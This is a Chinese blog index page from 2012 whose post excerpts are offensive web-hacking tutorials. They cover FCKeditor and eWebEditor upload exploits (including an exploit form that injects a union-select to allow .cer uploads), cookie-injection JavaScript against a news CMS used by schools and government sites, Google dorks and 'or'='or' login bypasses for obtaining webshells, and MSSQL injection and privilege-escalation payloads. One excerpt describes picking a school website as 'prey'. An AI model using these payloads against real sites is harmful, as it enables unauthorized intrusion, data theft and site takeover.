山貓 - 博客园

2012年11月15日

摘要：文章来源莲山课件www.5YKJ.Com1Fckeditor漏洞利用总结查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2.Version2.2版本Apache+linux环境下在上传文件后面加个.突破！测试通过。—————————————————————————————————————————————————————————————3.Version<=2.4.2Forphp在处理PHP上传的地方并未对Media类型进行上传文件类型的控制，导致用户上传阅读全文

posted @ 2012-11-15 22:48 山貓阅读(398) 评论(0) 推荐(0) 编辑

三顾讯时--对讯时新闻发布系统的艰难突破

摘要：作者:月无痕&&花非花来源：红狼安全小组（www.wolfexp.net,www.crst.com.cn）注:本文以发表于黑客手册,转载请加上出处一.接触起因这几天事情较多，一直都没去老大的论坛转！今天好友joli突然Q我说论坛上有人发了个脚本的问题，叫我也一起看一下，于是我就跑过去看了下（你家离论坛很近？竟然可以跑着过去！），也就有了下面这篇文章（测试版本为讯时新闻发布系统v2.70版）。二.漏洞初探打算先看有没有经典的OR漏洞，虽然已经出来很久的漏洞了，但是很多程序仍然会存在这样的漏洞，admin_login.asp存在如下代码：if request("user 阅读全文

posted @ 2012-11-15 22:44 山貓阅读(285) 评论(0) 推荐(0) 编辑

讯时新闻系统漏洞

摘要：这套系统有N年版,一般的政府、学校和企事业单位用得多,特证: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录,下面的数据库是用的db/#ewebeditor.asp以上特证只要中二个就基本可以肯定是这套系统漏洞:这套系统原来有N多漏洞,但经过改进,现在主要的问题是COOKIES注入和列目录问题具体的代码我就讲了,直接讲利用第一板斧:老版中存在一个后台COOKIES注入直接打开登陆后台,然后在地址栏输入javascript:alert(document.cookie="adminuser="+es 阅读全文

posted @ 2012-11-15 22:42 山貓阅读(694) 评论(0) 推荐(0) 编辑

讯时新闻系统再探

摘要：今天学习网络渗透，到网上寻找一下猎物。找到一个学校的网站，我一看http://www.test.com/xsnews/News_View.asp?NewsID=249这样的网址，知道又碰到讯时新闻系统了，学校用这个系统的还真不少。前几次用以前的漏洞，进去过，但是讯时对那些太老的漏洞都已经打了补丁。这次我还是用那三板斧都试了已通，未果。我想起来有篇文章叫《三顾讯时--对讯时新闻发布系统的艰难突破》http://huaidan.org/archives/1023.html，开始总是没有耐心看完，这次我耐心看了一遍，好多分析过程，引用了不少漏洞代码，总之漏洞页在admin_news_view.asp 阅读全文

posted @ 2012-11-15 22:40 山貓阅读(223) 评论(0) 推荐(0) 编辑

.教你拿webshell的45种方法

摘要： 1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2.到Google ,site:cq.cn inurl:asp 3.利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆 4.关键字：Co Net MIB Ver 1.0网站后台管理系统帐号密码为 'or'='or' 5.动感购物系统 inurl:help.asp登陆，如未注册成为会员! upLoad_bm1.asp和upLoad_c1.asp这两个随阅读全文

posted @ 2012-11-15 22:38 山貓阅读(1447) 评论(0) 推荐(0) 编辑

MsSQL注入猜解数据库技术

摘要：一、having与group by查询报表名与字段名 1.当确定有注入点以后，直接提交having 1=1-- 在错误信息里面即可得到当前表名的第一个字段。 2.然后提交 group by 字段名1 having 1=1-- 即可得到第二个字段 3.然后 group by 字段名1,字段名2 having 1=1-- 4.group by 字段名1,字段名2,字段名3，字段名n having 1=1-- 直到返回正常信息，即可得到所有的字段名二、order by与数据类型转换报错法 1.爆所有数据库名 and db_name()=0-- 爆当前库名 and db_name(n)>0-- 阅读全文

posted @ 2012-11-15 22:01 山貓阅读(565) 评论(0) 推荐(0) 编辑

MsSQL高级注入命令提权

摘要：一、基本信息搜集 1.注入点类型的判断 and exists (select * from sysobjects) 2.注入点权限判断 and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员 and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限 and 1=(select is_srvrolemember('public')) //判断是否为public权限 3.其他信息获取 ;declare @d int //判断MsSQL支持多行阅读全文

posted @ 2012-11-15 03:20 山貓阅读(949) 评论(0) 推荐(0) 编辑

2012年11月14日

ewebeditor asp版 2.1.6 上传漏洞利用程序

摘要： <H1>ewebeditorasp版2.1.6上传漏洞利用程序----</H1><br><br><formaction="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye'unionselectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_Me 阅读全文

posted @ 2012-11-14 20:59 山貓阅读(1261) 评论(0) 推荐(0) 编辑

黑客游戏网址大全 – Hack Game Collection

摘要：转载自：http://www.forece.net/post/2513.htm不知道是不是很多人像我一样，很喜欢这类黑客解谜游戏，感觉很锻炼脑子，当时黑客防线推出那款黑客游戏，有一关，我想了足足8个小时，也不觉得累。后来华夏等网站相继推出黑客游戏，我是乐此不疲。在网上也找了很多国外的黑客游戏。这里是我收集的一些黑客游戏，有网页版的，有客户端版的。对于黑客游戏，不仅仅是锻炼自己的推理能力，而且还能让自己的思维更加活泼。不过电脑小白就不要玩了。。。。。。。很可能想爆了脑袋也过不去一关。这里需要很多的知识，Java,PHP,HTML,Javascript等网页语言，另外有的游戏还需要了解程序的加壳脱阅读全文

posted @ 2012-11-14 20:59 山貓阅读(2314) 评论(0) 推荐(0) 编辑

SQL注入详解

摘要： SQL注入是从正常的 WWW 端口访问，而且表面看起来跟一般的 Web 页面访问没什么区别，所以目前市面的防火墙都不会对SQL注入发出警报，如果管理员没查看 IIS 日志的习惯，可能被入侵很长时间都不会发觉。但是，SQL注入的手法相当灵活，在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析，构造巧妙的SQL语句，从而成功获取想要的数据，是高手与“菜鸟”的根本区别。根据国情，国内的网站用 ASP+Access 或 SQLServer 的占 70% 以上，PHP+MySQ 占 20%，其他的不足 10%。在本文，我们从分入门、进阶至高级讲解一下 ASP 注入的方法及技巧，PHP 注入阅读全文

posted @ 2012-11-14 20:57 山貓阅读(213) 评论(0) 推荐(0) 编辑

cookie注入详解

摘要： cookie注入绕过SQL通用防注入程序ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5. 阅读全文

posted @ 2012-11-14 20:53 山貓阅读(873) 评论(0) 推荐(0) 编辑

sql注入漏洞测试

摘要：最近在学习mssql注入漏洞，一直找不到合适的网站系统，自己做了个有漏洞的连接数据库的代码来实验。<html><head><title>sql注入漏洞测试</title></head><body><%MM_conn_STRING = "Driver={SQL Server};server=(local);uid=sa;pwd=123;database=test;"Set conn = Server.Createobject("ADODB.Connection")conn.ope 阅读全文

posted @ 2012-11-14 15:05 山貓阅读(362) 评论(0) 推荐(0) 编辑

山貓

The quieter you become,the more you are able to hear.

公告